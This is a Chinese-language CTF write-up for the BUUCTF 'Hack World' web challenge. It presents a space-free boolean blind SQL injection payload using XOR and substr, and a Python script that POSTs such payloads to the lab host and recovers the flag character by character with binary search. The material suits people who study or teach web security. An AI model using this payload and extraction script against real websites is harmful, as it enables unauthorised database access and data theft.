buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World

一个盲注过滤了很多东西
最后发现这样可以正常回显
id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))
写脚本一位位爆破，二分法找

#!/usr/bin/python
#-*-coding:utf-8 -*-
import requests
import re

def flag_get(start,f,url):    #确定start位的字符
	a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))='+str(f)+'),0,1))'
	data = {'id': a }
	url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'
	r= requests.post(url, data)
	s=r.text
	#print(s)
	if 'Hello' in s:
		return 1
	else:
		return 0

def flag_find(start,f,url): #确定
	a='1^(if((ascii(substr((select(flag)from(flag)),'+str(start)+',1))>'+str(f)+'),0,1))'
	data = {'id': a }
	url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'
	r= requests.post(url, data)
	s=r.text
	#print(s)
	if 'Hello' in s:
		return 1
	else:
		return 0



if __name__ == '__main__':
	url = 'http://76333ea2-9071-468b-ad3c-930e98a4ead2.node1.buuoj.cn/index.php'
	flag_kouhao=125
	flag=''
	num=1       #从第num位开始爆破
	while 1:
		start=32   #ascii的起始范围（10进制）
		last=126   #ascii的终止范围（10进制）
		mid=int((start+last)/2)
		while 1:
			if(flag_get(num,flag_kouhao,url)):
				flag=flag+'}'
				print('flag     is    :'+flag)
				exit(1)
			print('strat is '+str(start))
			print(' mid  is '+str(mid))
			print('last  is '+str(last))
			print('****************************************')

			if(flag_find(num,mid,url)):
				start=mid
				mid=int((start+last)/2)
				if ((last-start)<5):
					break
			else:
				last=mid
				mid=int((start+last)/2)
				if ((last-start)<5):
					break
		print(start)
		print(last)
		print('****************************************')
		for i in range(start,last+1):
			print(i)
			if(flag_get(num,i,url)):
				f=chr(i)
				flag=flag+f
				print('****************************************')
				print(' num is '+str(num))
				print('char is '+f)
				print('flag is '+flag)
				print('****************************************')
				break
		num=num+1	
	print(flag)